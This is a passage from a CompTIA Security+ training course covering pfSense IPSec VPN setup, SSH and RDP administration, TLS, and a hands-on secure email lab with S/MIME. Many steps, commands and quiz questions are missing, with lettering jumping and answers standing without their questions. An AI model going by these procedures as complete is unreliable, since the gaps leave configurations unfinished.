e) In the download bar, select the arrow on the Save button and select Save As. In the
Save As dialog box, browse to C:\LABFILES then select the Save button.
Exporting the CA root certificate (Screenshot used with permission from Rubicon
Communications, LLC.)
6. Later, you will need to export this certificate to the VPN client machines so that
they trust the VPN concentrator, but for now, configure the actual server
certificate.
a) In the pfSense web app, select the Certificates tab. Select the Add button. Complete
the page with the following information:
• Method—select Create an internal Certificate.
• Descriptive name—enter 515support VPN
• Certificate Type—select Server Certificate.
• Common Name—select vpn.515support.com.
• Alternative Names—select IP address from the list box and enter 172.16.0.254 in
the adjacent text box.
The Common Name must match the host details that VPN users will use to contact
the VPN gateway. You can add multiple alternate names, but these are not always
reliably processed by different client types.
b) Select Save.
7. With the authentication server and certificate configured, the next task is to
configure the VPN protocol itself. Set up an IKE v2 (Internet Key Exchange) IPSec
tunnel.
One of the advantages of this type of VPN is that no special Windows client software is
required.
a) In the pfSense web app, select VPN→IPSec then select the Mobile Clients tab.
b) Check the IKE Extensions check box.
c) In the User Authentication box, select 515support AD.
d) Under Client Configuration, select the Virtual Address Pool box then in the
Network box, type 10.2.0.0 and select the 24 netmask.
e) Check the Network List check box.
f) Check the DNS Default Domain check box then in the adjacent text box, type corp.
515support.com
g) Check the DNS Servers check box then in the Server #1 text box, type 10.1.0.1
Configuring the IPSec client support settings. (Screenshot used with permission from
Rubicon Communications, LLC.)
h) Select Save.
i) At the top of the page, select the Apply Changes button.
j) Select the Create Phase 1 button.
k) From the Key Exchange version list box, select IKEv2.
l) Under Phase 1 Proposal, from the Authentication Method list box, select EAP-
RADIUS.
m) From the My Certificate box, select 515support VPN.
n) Under Advanced Options, check the Disable rekey and the Disable Reauth check
boxes.
o) Select Save.
p) Select the Apply Changes button.
q) Select the blue Show Phase 2 Entries button, then select the Add P2 button.
r) Leave the Mode box set to Tunnel IPv4.
Remember, IPSec can be used in tunnel or transport modes. Tunnel is the
appropriate type for the sort of remote access VPN you are creating.
s) Under Phase 2 Proposal, check the SHA256 check box (and leave the other default
selections checked).
You could also configure AH mode through this page. You'll use ESP for this
connection, though.
t) Select Save.
u) Select the Apply Changes button.
8. Create a rule to allow traffic to pass from the VPN subnet to the LAN.
a) Select Firewall→Rules then select the IPSec tab.
d) Select Save.
e) Select the Apply Changes button.
9. Configure a Windows client with the appropriate settings to join the VPN. You can
deploy the VPN configuration using GPO.
a) On the DC1 VM, in Server Manager, select Tools→Group Policy Management.
b) In the Group Policy Management console, expand Forest→Domains→corp.
515support.com. Right-click the ComputersOU container and select Create a GPO
in this domain, and Link it here.
c) In the Name box, type VPN Policy and select OK.
d) Expand the ComputersOU container then right-click the VPN Policy and select Edit.
10. To configure the policy, add the VPN server's self-signed CA as a trusted root CA.
a) In the Group Policy Management Editor, expand Computer
Configuration→Policies→Windows Settings→Security Settings→Public Key
Policies→Trusted Root Certification Authorities.
b) Right-click in the empty space and select Import.
c) On the first page of the wizard, select Next. Select the Browse button then select the
C:\LABFILES folder. Select the 515support+VPN+CA.crt file and select Open.
d) Select Next.
e) With Place all certificates in the following store and Trusted Root Certification
Authorities certificate store selected, select Next.
f) Select Finish. When the confirmation prompt is displayed (there will be a short delay),
select OK.
Configuring a VPN adapter via GPO. (Screenshot used with permission from Microsoft.)
d) Select the Apply button.
e) Select the Security tab. Select the Advanced (custom settings) option button.
f) From the Data encryption list box, select Required.
Defining VPN connection security settings. (Screenshot used with permission from
Microsoft.)
h) Select OK.
12. To test the VPN, change the configuration of the PC1 VM.
a) On the HOST, in the Hyper-V Manager console, start the PC1 VM.
b) Open a connection window for the PC1 VM and sign in as 515support\Administrator
with the password Pa$$w0rd
c) Right-click the Network Status icon in the notification area and select Open
Network and Sharing Center. Select Change adapter options.
d) Right-click Ethernet and select Properties. Double-click Internet Protocol Version 4
(TCP/IPv4).
e) Select the Advanced button. On the IP Settings page, uncheck the Automatic
metric check box and in the Interface metric box, type 15 and select OK.
f) Select OK to close each Properties dialog box.
g) Right-click the 515support VPN adapter and select Properties. On the Networking
tab, select Internet Protocol Version 4 (TCP/IPv4) then select the Properties button.
h) Select the Advanced button. On the IP Settings page, select to uncheck the
Automatic metric box and in the Interface metric box, type 10. Select OK to close
each dialog box.
i) Sign out of the Administrator account.
13. Update the DNS records on LAMP to point to the new external IP address for the
VPN concentrator.
a) Open a LAMP VM console window. Enter the username lamp (unlike Windows, this is
case-sensitive) and then the password Pa$$w0rd
b) Run the following two commands. (Ignore any line break in the sudo mv command)
and enter the password Pa$$w0rd when prompted:
14. Connect to the VPN from the PC1 VM. Let's imagine that you have configured a
laptop with this VPN client and some time later a user needs to connect to the
515support network from a remote location.
a) In the connection window menu for the PC1 VM, select File→Settings.
b) Select the Network Adapter node. In the right-hand pane, under Virtual switch,
select vINT02. Select OK.
c) Sign back into the VM with the username PC1\Admin and password Pa$$w0rd.
This is the local administrator account. Allowing the domain user to run the VPN
connection requires delegating administrative control over the local computer, which
is a bit complex to implement for this activity.
d) Select Yes if prompted to enable network discovery.
e) Open Wireshark and start a packet capture on the Ethernet interface.
f) Select the Network Status icon in the notification area, select 515support VPN,
and then select Connect.
g) Enter the username as Viral and the password as Pa$$w0rd then select OK.
h) When the connection is established, complete the following tests:
• Browse the file share \\DC1\LABFILES.
• Browse the website on the member server http://updates.corp.
515support.com.
• Browse http://www.515web.net.
i) Run ipconfig and note the IP address assigned to the tunnel (PPP) adapter.
j) Run route print and note the gateways for the various subnets.
Windows 10 uses split tunneling by default, so sites such as 515web.net are accessed
directly over the Ethernet adapter rather than routed through the 10.2.0.0 IPSec
virtual network.
k) Stop the Wireshark capture.
l) Observe the ISAKMP frames setting up the tunnel and the subsequent encrypted ESP
frames exchanging packets over the VPN.
Observing IPSec tunnel establishment (ISAKMP frames) and subsequent encrypted ESP
frames. (Screenshot used with permission from Wireshark.)
If you have time, explore the following logs to investigate the connection properties.
m) On the PC1 VM, use Event Viewer to view the Application log and the RasClient
messages.
If you are troubleshooting VPN connections, error messages can also be written by
RAS services to the System log.
Viewing the messages in the Application log in Event Viewer. (Screenshot used with
permission from Microsoft.)
n) On the DC1 VM, in the pfSense web app, select Status→ IPSec to view current
connections.
If necessary, log into PFSENSE again as admin with the password Pa$$w0rd
o) Select Status→System Logs and then select the IPSec tab to view server logs.
p) Select the Firewall tab to view the firewall logs.
q) On the DC1 VM, open Event Viewer then select Custom Views→Server
Roles→Network Policy and Access Services.
This log records who has been granted access and can also be used to troubleshoot
problems with the RADIUS authentication process.
r) On the PC1 VM, from the Network icon in the notification area, select 515support
VPN, then select Disconnect.
Topic C
Implement Secure Remote
Administration Protocols
EXAM OBJECTIVES COVERED
2.6 Given a scenario, implement secure protocols.
A remote access VPN provides a secure means for remote users to access network
services. There are also many cases where a user needs to remotely access an
individual host. This is most commonly implemented to allow administrators to
perform remote management of workstations, servers, and network appliances, but it
can also be used to provide ordinary users access to a desktop as well.
TELNET
Remote administration tools allow administrators to manage and configure a
computer over a network. They can work over a local network, over a VPN, or even
across the Internet, if the appropriate ports are opened on the firewall. Remote
administration tools are enormously useful, but they also represent a significant
security exploit if their use is not secured.
Telnet is terminal emulation software to support a remote connection to another host.
It does not support file transfer directly, but when you connect, your computer acts as
if your keyboard is attached to the remote host and you can use the same commands
as a local user. In order to support Telnet access, the remote host must run a service
known as the Telnet Daemon. Telnet uses TCP port 23 by default.
Telnet is not secure. Telnet daemon software has exploitable vulnerabilities and Telnet
communications, including passwords, are sent in cleartext. One option would be to
ensure Telnet is only used over a secure channel, such as an IPSec tunnel. However,
most hosts support more secure remote administration mechanisms.
Confirming the SSH server's host key using the PuTTY SSH client (Screenshot used with permission from
PuTTY.)
Note: The host key must be changed if any compromise of the host is suspected. If an
attacker has obtained the private key of a server or appliance, they can masquerade as
that server or appliance and perform a Man-in-the-Middle attack, usually with a view to
obtaining other network credentials. You might also change the key to use a longer bit
strength.
The server's host key is used to setup a secure channel to use for the client to submit
authentication credentials. SSH allows various methods for the client to authenticate to
the SSH server. Each of these methods can be enabled or disabled as required on the
server:
• Username/password—the client submits credentials that are verified by the SSH
server either against a local user database or using an AAA server, such as RADIUS
or TACACS+.
• Kerberos—the client submits the Kerberos credentials (a Ticket Granting Ticket)
obtained when the user logged onto the workstation to the server using GSSAPI
(Generic Security Services Application Program Interface). The SSH server contacts
the Ticket Granting Service (in a Windows environment, this will be a domain
controller) to validate the credential.
• Host-based authentication—the server is configured with a list of authorized client
public keys. The client requests authentication using one of these keys and the
server generates a challenge with the public key. The client must use the matching
private key it holds to decrypt the challenge and complete the authentication
process. This provides non-interactive login but there is considerable risk from
intrusion if a client host's private key is compromised.
• Public key authentication—host-based authentication cannot be used with fine-
grained access controls as the access is granted to a single user account. The same
sort of public key authentication method can be used for each user account. Each
remote user's public key is added to a list of keys authorized for each local account
on the SSH server. The user's private key can be configured with a passphrase that
must be input to access the key, providing an additional measure of protection
compared to host-based authentication.
Using PuTTY Key Generator to create an RSA-format key pair. The public key value should be copied to
the SSH server in the appliance you are going to access; the linked private key value must be kept
secure and secret. (Screenshot used with permission from PuTTY.)
Note: Managing valid client public keys is a critical security task. Many recent attacks on
web servers have exploited poor key management. If a user's private key is compromised,
delete the public key from the appliance then regenerate the key pair on the user's
(remediated) client device and copy the public key to the SSH server. Always delete public
keys if the user's access permissions have been revoked.
password hash for the account used to connect and then use it in a Pass-the-Hash
(PtH) or ticket-forging attack. RDPRA was unsuccessful in mitigating this (it was itself
vulnerable to PtH). Remote Credential Guard means that any access requests are
processed by the RDP client machine, not on the server.
There are several popular alternatives to Remote Desktop. Most support remote
access to platforms other than Windows (macOS and iOS, Linux, Chrome OS, and
Android for instance). Examples include TeamViewer (https://www.teamviewer.us)
and Virtual Network Computing (VNC), which is implemented by several different
providers (notably https://www.realvnc.com).
Activity 12-5
Discussing Secure Remote
Administration Protocols
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
2. What is the main risk of using remote administration tools over a network
without encryption?
The username and password would be passed in cleartext. As this is most likely
to be the password for an administrative account, this makes the network
extremely vulnerable.
The server's public key (host key). Note that this can only be trusted if the client
trusts that the public key is valid. The client might confirm this manually or
using a Certificate Authority.
Summary
In this lesson, you continued the review of network architecture and design by looking
at network operations protocols that provide secure addressing, name resolution,
remote access, and remote administration.
• Identify risks associated with critical address allocation and name resolution
services and how to implement them securely.
• Install and configure different types of VPNs, including TLS VPNs and IPSec VPNs.
• Use SSH and Remote Desktop to remotely manage hosts.
What networking protocols have you worked with in your organization? What
security features do these protocols offer?
A: Answers will vary. You may be familiar with configuring HTTPS to encrypt and
authenticate communications between customers and company web servers;
using SSH to encrypt and authenticate command sessions with remote systems;
configuring a VPN with a secure IPSec tunnel to enable employees to remotely
access the private network over the Internet; configuring DNSSEC to protect the
integrity of DNS resolution in the private network; and more.
What experience do you have with remote access and administration? What
types of remote services are you familiar with?
A: Answers will vary, but may include remote access implementations, such as
using a VPN to provide access to systems and services for remote employees,
using IPSec to secure network communications, or using RDP to provide remote
administration capabilities.
Practice Questions: Additional practice questions are available on the course website.
LESSON INTRODUCTION
The network infrastructure of switches, routers, access points, and secure hosts is all implemented
for the purpose of running services. The application protocols that enable web, email, and VoIP
require secure configuration too. You also need to plan how advanced network architecture, such
as virtualization and cloud, can be deployed securely to support these applications.
LESSON OBJECTIVES
In this lesson, you will:
• Implement secure web services.
• Implement secure communications services.
• Implement a secure virtualization infrastructure.
• Implement secure cloud services.
Topic A
Implement Secure Web Services
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.6 Given a scenario, implement secure protocols.
3.2 Given a scenario, implement secure network architecture concepts.
The influence of web services delivered over the Internet on modern life cannot really
be overstated, but web services have had a significant impact on the way local network
applications are designed and delivered, too. Consequently, the secure delivery of web
applications is at the core of most networks. As a network security professional, you
must be able to implement these important protocols.
typically configured for guest access to Apache®. The guest account should have no
permissions outside the directory set up for browsing.
Note: Guests may require execute permissions on scripts and applications that you
want them to be able to run, and these may be stored in a directory outside the root
of the website.
• When a web server is leased, a secure means of uploading files and configuration
changes needs to be used (SSH, for example). Most hosting packages include a GUI
management application such as cPanel. Remember that ordinary FTP connections
are not secure (critically, authentication information is transmitted in plaintext).
• When a web server is connected to a private network, the location of the server
should be carefully considered so as not to expose the private network to attack
from the public one through the web server. This is typically achieved by placing a
firewall between the web server and the local network, creating a Demilitarized
Zone (DMZ).
• Use separate accounts to administer servers in the DMZ, and ensure that the
accounts do not share credentials with any other accounts on the LAN.
• Web servers are typically installed with sample pages (and even scripts) along with
help documentation. These samples sometimes contain vulnerabilities and should
be removed from a production server.
• Logging provides valuable information regarding the use of the website, alerts of
any unusual or suspicious behavior, and audit changes made to pages and settings.
TCP/IP stack. It is usually used to encrypt TCP connections. It is typically used with the
HTTP application (referred to as HTTPS or HTTP Over SSL or HTTP Secure) but can also
be used to secure other TCP application protocols, such as Telnet, FTP, NNTP, SMTP, or
LDAP.
To implement HTTPS, a server is assigned a digital certificate signed by some trusted
certificate authority (CA). The certificate proves the identity of the server (assuming
that the client trusts the Certificate Authority). The server uses the digital certificate
and the SSL/TLS protocol to encrypt communications between it and the client. This
means that the communications cannot be read or changed by a third party.
Note: HTTPS operates over port 443 by default. HTTPS operation is indicated by using
https:// for the URL and by a padlock icon shown in the browser.
It is also possible to install a certificate on the client so that the server can trust the
client. This is not often used on the web but is a feature of VPNs and enterprise
networks.
Note: TLS is increasingly used with UDP, most often in TLS VPN solutions.
SSL/TLS OPERATION
The initial connection is governed by the SSL/TLS Handshake sub-protocol:
1. The client makes a connection request (CLIENT_HELLO) listing the highest protocol
version, cipher suites, and compression algorithm(s) supported. It also sends the
date and time plus a random number (ClientRandom), which is used to generate
the secret key. The client may also specify a session ID, allowing resumption of an
existing session without re-generating keys (which is processor intensive).
Observing the TLS handshake in a Wireshark packet capture—The CLIENT HELLO packet sends
the cipher suites supported (amongst other data). (Screenshot used with permission from
Wireshark.)
Note: In this context, SSL 3.1 is used to mean TLS. Most implementations do not
actually support any compression technologies.
2. The server responds with SERVER_HELLO, selecting the highest protocol version
and strongest cipher suite supported by both, and its own randomly generated
number (ServerRandom), along with any session information.
3. If client and server support compatible versions and ciphers, the server sends its
X.509 certificate to the client (CERTIFICATE command) followed by the
SERVER_DONE command.
Note: A server can optionally request a certificate from the client, providing mutual
authentication. More commonly, the client is untrusted.
4. The client checks the server's certificate and if verified, responds with
CERTIFICATE_VERIFY. It then performs key exchange or key agreement to select
the secret session key for use with the confidentiality cipher, such as AES. This
process can be completed using either RSA or Diffie-Hellman. If using RSA, the
client generates a pre-master secret, encrypts it using the server's public key, and
sends it to the server.
5. The server and client then follow the same steps to derive a shared master secret
from the pre-master secret and the ClientRandom and ServerRandom values.
6. Client and server then exchange the CHANGE_CIPHER_SPEC command, to indicate
that subsequent communications will be encrypted, and the FINISHED command,
which contains a digest of the command exchange that is used to verify that the
handshake process has not been tampered with.
7. Once the session is established, client and server exchange encrypted data in
SSL/TLS records, which are placed into transport layer packets for delivery.
Note: The Alert sub-protocol defines error messages (such as
CERTIFICATE_EXPIRED).
SSL/TLS VERSIONS
While the name SSL is still widely used, the Transport Layer Security versions are the
only ones that are safe to use. SSL and TLS versions are not interoperable; that is, a
client supporting only SSL 3.0 could not connect to a server supporting only TLS 1.0. A
server can provide support for legacy clients, but obviously this is less secure. For
example, a TLS 1.2 server could be configured to allow clients to downgrade to TLS 1.1
or 1.0 or even SSL 3.0 if they do not support TLS 1.2.
Note: A downgrade attack is where a Man-in-the-Middle tries to force the use of a weak
cipher suite and SSL/TLS version.
SSL 2.0 and 3.0 are both deprecated, and SSL 1.0 was never used commercially. TLS 1.2
is widely supported now, and older versions should only be deployed when subject to
risk assessments. The most notable changes between TLS 1.0, 1.1, and 1.2 are
improvements to the cipher suite negotiation process (the means by which server and
client agree to use the strongest ciphers available to both) and protection against
known attacks. TLS 1.2 also adds support for the strong SHA-256 cipher.
TLS version 1.3 was approved in 2018. One of the main features of TLS 1.3 is the
removal of the ability to perform downgrade attacks by preventing the use of unsecure
features and algorithms from previous versions. There are also changes to the
handshake protocol to reduce the number of messages and, therefore, speed up
connection establishment. TLS 1.3 cipher suites only include the mechanisms used for
confidentiality and integrity (AES with SHA, for instance). Key exchange/agreement and
authentication algorithms are specified separately. This should make selecting the
algorithms simpler and less prone to configuration errors as there isn't a list of 30 or
more cryptically named suites to choose from and it allows the actual cipher
negotiation process to be streamlined.
SUBSCRIPTION SERVICES
Employees may require access to all kinds of subscription services. Some examples
include:
• Market and financial intelligence and information.
• Security threat intelligence and information.
• Reference and training materials in various formats (ebook and video, for instance).
• Software applications and cloud services paid for by subscription rather than
permanent licenses.
Most of this sort of content will be delivered by a secure web site or cloud application.
It may be necessary to provision authentication mechanisms for enterprise Single-Sign
On (SSO) access to the services.
Another use of subscriptions is a web feed, where updated articles or news items are
pushed to the client or browser. Web feeds are based on either the Really Simple
Syndication (RSS) or Atom formats, both of which use eXtensible Markup Language
(XML) to mark up each document supplied by the feed. It is possible that such feeds
may be vulnerable to XML injection style attacks, allowing an attacker to show
malicious links or even interact with the file system (https://mikeknoop.com/lxml-
xxe-exploit).
Note: Subscription services may also describe the outsourcing of network and security
components and procedures. There may also be subscription use of enterprise cloud
applications, which may be mediated by an access broker.
FILE TRANSFER
There are many means of transferring files across networks. A network operating
system can host shared folders and files, enabling them to be copied or accessed over
the local network or via remote access (over a VPN, for instance). Email and IM
applications allow file transfer using attachments to messages. HTTP supports file
download (and uploads via various scripting mechanisms). The TCP/IP FTP protocol
and various peer-to-peer file sharing products can be used to transfer files more
quickly and efficiently, however.
FTP clients usually have GUIs to help the user, though FTP can be performed over a
command line as well. Most web browsers can function as basic FTP clients.
Note: You should check that users do not install unauthorized servers on their PCs (a
rogue server). For example, a version of IIS that includes HTTP, FTP, and SMTP servers is
shipped with client versions of Windows, though it is not installed by default.
Activity 13-1
Discussing Secure Web Services
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic.
Do not re-use account names or passwords from the private network. Ensure
that the guest account is only configured to browse resources.
2. How does SSL accomplish the secure exchange of session keys using
certificates?
If using RSA key exchange, the server sends its certificate to the client, which
uses the public key in the certificate to encrypt a pre-master secret. The client
and server then calculate the same master secret and use that to create the
session key. Alternatively, the Diffie-Hellman key agreement protocol can be
used to generate an ephemeral session key, which does not depend on the
continued security of the server's private key.
3. A client and server have agreed on the use of the cipher suite ECDHE-ECDSA-
AES256-GCM-SHA384 for a TLS session. What is the key strength of the
symmetric encryption algorithm?
256-bit (AES).
SSL decryptor (though this type of gateway is also often called an inspector,
decoder, or interceptor).
Topic B
Implement Secure Communications
Services
EXAM OBJECTIVES COVERED
2.1 Install and configure network components, both hardware- and software-based, to
support organizational security.
2.6 Given a scenario, implement secure protocols.
Note: POP and IMAP also support the STARTTLS command, but this is not often used in
practice, with implicit TLS over the default secure ports much more widely implemented.
Mail relay—Local network clients use a relay or proxy located in a secure zone on the network edge,
rather than transferring messages directly. (Image © 123RF.com.)
The mail relay can be installed with software to monitor and filter email traffic,
checking for spam and infected file attachments.
Intermedia hosted Exchange mail filtering gateway. (Screenshot used with permission from
Intermedia.)
Apart from message-based filtering and using blacklists (to block mail servers or
domains known to send spam), there are many other methods for trying to reduce
spam. As with filters, though, these can generate numerous false positives (that is,
block legitimate traffic). Some examples include:
• Whitelist—if an organization only deals with a limited number of correspondents,
they can set up a whitelist of permitted domains or use some sort of authentication
between the mail servers.
• SMTP standards checking—rejecting email that is not strictly RFC-compliant can
block some spam, but may also block legitimate traffic.
• rDNS (reverse DNS lookup)—rejecting mail from servers where the IP address does
not match the domain in the message header or is a dynamically assigned address.
• Tarpitting—introducing a delayed response to the SMTP session. This makes the
spammer's server less efficient; in many cases, the spamming software will simply
give up.
• Recipient filtering—blocking mail that is not addressed to a valid recipient email
address.
Note: Spam filtering can cause legitimate messages to be blocked. It needs careful
configuration to provide the right balance between security and usability.
Apart from message filtering, a mail gateway could provide other services:
• Data Loss Prevention (DLP)—the relay can act as an enforcer for any DLP policies,
scanning messages to ensure that no data is being communicated in a way that is
not compliant with policy.
• Encryption—a relay can handle message encryption and decryption for all
messages leaving and arriving at the company. This is an alternative to relying on
individual users to set up mail security on their clients. External recipients can
configure an account to authenticate with the gateway to allow them to decrypt
messages sent to them and submit messages to the company securely.
Enabling SIP/TLS security on a 3CX PBX VoIP softphone. (Screenshot used with permission from 3CX.)
Connection security for VoIP works in a similar manner to HTTPS. To initiate the call,
the secure version SIPS uses digital certificates to authenticate the endpoints and
establish an SSL/TLS tunnel. SIPS uses TCP port 5061 by default. The secure connection
established by SIPS can also be used to generate a master key to use with the secure
versions of the transport and control protocols (SRTP and SRTCP). These use AES
encryption and SHA hashing for message confidentiality and integrity.
Enforcing RTP protocol encryption on a Mitel PBX system. (Screenshot used with permission from
Mitel.)
Activity 13-2
Discussing Secure Communications
Services
SCENARIO
Answer the following questions to test your understanding of the content covered in
this topic
Port 587 with STARTTLS (explicit TLS) or port 465 with implicit TLS.
The recipient's public key (principally). The public key is used to encrypt a
symmetric session key and (for performance reasons) the session key does the
actual data encoding. The session key and, therefore, the message text can then
only be recovered by the recipient, who uses the linked private key to decrypt it.
Activity 13-3
Installing and Configuring a Secure
Email Service
SCENARIO
Cryptography has two main applications for email services. First, it provides a means
for clients to connect to servers securely, ensuring that passwords and messages
cannot be snooped upon. Second, users can encrypt and authenticate the messages
themselves for transmission across untrusted networks and servers. In this activity,
you will configure email protocols to use TLS tunnels and configure S/MIME certificates
to allow users to send secure messages. This activity is designed to test your
understanding of and ability to apply content examples in the following CompTIA
Security+ objectives:
• 2.1 Install and configure network components, both hardware- and software-based,
to support organizational security.
• 2.6 Given a scenario, implement secure protocols.
1. Exchange messages between KALI and PC1. Review the activity environment
topology, summarized in the following figure. A mail client has already been
configured on KALI. Use it to send a message to [email protected].
Network topology—The LAMP email server hosting a 515web.net domain is located on the
192.168.1.0/24 subnet, while the MS1 VM provides email services for the Windows network; there
are no firewalls to worry about. (Image © 123RF.com.)
a) Open a connection window for the KALI VM and log on with the credentials root/Pa$
$w0rd
b) Use the application bar to open the application Icedove Thunderbird.
Note: If there are problems configuring mail, verify that the DHCP and
hMailServer services on MS1 are started.
f) Select Done.
g) Check the I understand the risks check box to acknowledge the unsecure
connection. Select Done.
h) In the System Integration dialog box, select Skip Integration.
i) Select the Inbox folder to check that the test message has arrived.
3. Securing mail protocols is similar to securing HTTP. You just need to install a
server certificate on the mail server then configure clients to connect using the
secure ports. Use IIS Manager on MS1 to request a new server certificate from the
515support CA.
a) Open a connection window for the MS1 VM, and sign in as 515support\Administrator
with the password Pa$$w0rd
b) In Server Manager, select Tools→Internet Information Services (IIS) Manager.
c) In the Connections pane, select the MS1 server. In the MS1 Home pane, open the
Server Certificates applet.
d) In the Actions pane, select Create Domain Certificate.
e) On the first page of the Create Certificate wizard, in the Common Name field, type
mail.515support.com
f) In the other fields, enter 515support or any city or state as appropriate.
g) Select Next.
h) On the Online Certification Authority page, select the Select button, then select
515support-CA and select OK.
i) In the Friendly name box, type mail.515support.com Domain-issued Certificate.
Select Finish.
After a few seconds, the certificate request will be granted.
5. Unfortunately, hMailServer cannot process .PFX files and Windows cannot export
the private key in any other format. Luckily, you can use OpenSSL to convert the
certificate. You will use a compiled version of OpenSSL created by Shining Light
Productions (https://slproweb.com/products/Win32OpenSSL.html).
a) Open a command prompt and run cd \openssl-win64\bin to change the
focus to the folder storing the program's binaries.
b) To convert the .PFX certificate, run the following commands—whenever prompted for
a password or passphrase use Pa$$w0rd to confirm (and ignore the line breaks—type
each openssl command in full):
openssl pkcs12 ‑in c:\LABFILES\mailcert.pfx -clcerts
‑nokeys ‑out c:\LABFILES\mailcert.pem
openssl pkcs12 -in c:\LABFILES\mailcert.pfx -nocerts ‑out
c:\LABFILES\key.pem
openssl rsa -in c:\LABFILES\key.pem -out c:\LABFILES
\mailcertkey.pem
These commands extract the certificate chain to one file (mailcert.pem) and the key
to another (key.pem), and then remove the passphrase from the key file
(mailcertkey.pem), as hMailServer cannot process the file if it is password protected.
g) From the Connection security box, select STARTTLS (Required) and from the SSL
Certificate box, select mail.515support.com.
Configuring connection security for SMTP mail submission over port 587. (Screenshot used
with permission from hMailServer.)
h) Select Save then confirm with Yes to restart. Select OK.
i) Select the TCP/IP ports node again, then select the Add button.
j) From the Protocol box, select IMAP.
k) In the TCP/IP address box, enter 0.0.0.0
l) In the TCP/IP port box, enter 993
m) From the Connection security box, select SSL/TLS and from the SSL Certificate box,
select mail.515support.com. Select Save then confirm with Yes to restart. Select OK.
n) Select the TCP/IP ports node again, select the 0.0.0.0/110/POP3 entry, then select the
Remove button. Confirm by selecting Yes.
o) Select the 0.0.0.0/143/IMAP entry then select the Remove button. Confirm by
selecting Yes.
7. Now that the mail server is set up with secure connection protocols, reconfigure
the mail client settings to trust the certificate and use the secure ports. One
complication is that Thunderbird uses its own certificate store and so must be
configured to trust the 515support-CA root certificate first.
a) Switch to the PC1 VM, select the Start button, type certmgr.msc and select the
cermgr.msc icon.
b) Browse to Certificates→Trusted Root Certification Authorities→Certificates.
c) Right-click the 515support-CA certificate and select All Tasks→Export.
d) On the first page of the wizard, select Next.
e) On the Export File Format page, select Next to accept the default of DER encoded
binary X.509 (.CER).
f) On the File to Export page, in the File name box, type C:\LABFILES\515support.cer
g) Select Next, select Finish, and then select OK.
h) Leave the console open.
i) In Thunderbird, press Alt to show the menu bar, then select Tools→Options.
j) Select the Advanced icon and the Certificates tab. Select the Manage Certificates
button.
k) With the Authorities tab selected, select the Import button. Browse to select C:
\LABFILES\515support.cer and select Open.
l) In the Downloading Certificate dialog box, check both check boxes, then select OK.
Configuring Firefox/Thunderbird to trust the domain root certificate. (Screenshot used with
permission from Mozilla Foundation.)
m) Select OK to close each dialog box.
n) Right-click the [email protected] account and select Settings.
o) Select the Server Settings node and in the Port box, type 993
p) In the Connection security box, select SSL/TLS.
Configuring the mail client to connect to the mailbox server over the secure IMAP port.
(Screenshot used with permission from Mozilla Foundation.)
q) Select the Outgoing Server (SMTP) node then select the Edit button.
r) In the Connection security box, select STARTTLS. Select OK.
Configuring the mail client to submit messages to the SMTP server on port 587 using
STARTTLS. (Screenshot used with permission from Mozilla Foundation.)
s) Select OK.
t) Reply to the test message from [email protected] then switch to the KALI
VM to verify that it arrives. Use the Get Messages button to check for new mail—it
may take a while for the message to be delivered.
8. Connection security ensures that no one can snoop on the connection between a
mail client and server, but it cannot secure the end-to-end delivery of messages
across the Internet. For authentication and confidentiality across an untrusted
network, you need to encrypt the actual messages. This can be done using GPG
certificates or S/MIME certificates. Use the Certificates snap-in to request a user
certificate from the domain CA.
a) Switch to the PC1 VM and select the Certificates console.
b) Browse to Certificates→Personal. Right-click in this folder and select All
Tasks→Request New Certificate.
c) On the first page of the wizard, select Next.
d) With Configured by your administrator→Active Directory Enrollment Policy
selected, select Next.
e) Check the User check box then select the Enroll button.
f) Select Finish.
e) On the Export File Format page, observe that only the PKCS #12 format is available.
Check the Include all certificates in the certification path if possible, Export all
extended properties, and Enable certificate privacy check boxes. Select Next.
f) Check the Password check box, then enter and confirm the password Pa$$w0rd and
select Next.
g) Enter the name C:\LABFILES\samcert
h) Select Next then Finish, and then OK.
i) Leave the console open.
j) In Thunderbird, press Alt to show the menu bar, then select Tools→Options.
k) Select the Advanced icon and the Certificates tab. Select the Manage Certificates
button.
l) Select the Your Certificates tab and select the Import button. Browse to and select
C:\LABFILES\samcert.pfx and select Open.
m) Enter Pa$$w0rd and select OK.
n) Select OK to close the dialog boxes.
10. With the certificate installed, configure the email client to use it for signing and
message confidentiality.
a) Right-click the [email protected] account and select Settings.
b) Select the Security node, then select the Select button under Digital Signing to
select the certificate. At the dialog box, select OK then select Yes to use the same
certificate for encryption as well.
Note: Best practice is to use separate certificates for these tasks to reduce
risks should the private key be compromised.
11. Send your public key to any recipient with whom you want to communicate
securely. To do this, use the Certificates snap-in to export the Sam certificate
using the PKCS #7 format.
a) In the PC1 VM, switch to the console with the Certificates snap-in loaded. Browse to
Certificates→Personal→Certificates.
b) Right-click the Sam certificate and select All Tasks→Export.
c) On the first page of the wizard, select Next.
d) Select No, do not export the private key. Select Next.
e) On the Export File Format page, select the Cryptographic Message Standard—
PKCS #7 Certificates (.P7B) format. Check the Include all certificates in the
certification path if possible check box and select Next.
The PKCS #7 (.P7B) format is used to exchange a whole certificate chain with a recipient
who does not have the same chain of trust. (Screenshot used with permission from
Microsoft.)
You need to use the P7B format to include the root certification authority's certificate.
f) Enter the name C:\LABFILES\samcert-chain
g) Select Next then Finish and then OK.
13. To enable exchange of secure messages, the hostmaster mail user needs to trust
this certificate.
a) Switch to the KALI VM. In Thunderbird, open the new message.
b) Select the red "x" shown on the message. The signature is not yet trusted. Select OK
to close the dialog box.
Message with an untrusted signature. (Screenshot used with permission from Mozilla
Foundation.)
c) At the bottom of the message window, select the Save button. Select the Desktop
location, and then select Save.
d) Select the Inbox tab again, then right-click the [email protected] account
and select Settings.
e) Select the Security node and select the View Certificates button.
f) Select the Authorities tab and select the Import button.
g) Select the samcert-chain.p7b file and select Open.
h) In the Downloading Certificate box, select the View button.
You could use the fingerprint information to verify the validity of the certificate, if you
suspected it and had a secure out-of-band means of contacting the certificate issuer.
i) Select Close. Check the Trust this CA to identify email users check box and select
OK.
j) Select the People tab and select the Import button.
k) Select the samcert-chain.p7b file and select Open.
l) Do not worry about the error message saying that the certificate cannot be trusted.
Select OK to close the dialog boxes.
m) In the Inbox, select outside the message, then select it again. The envelope icon
should now appear with a seal. If you select it, the dialog box confirms that the
message is signed and has not been tampered with.
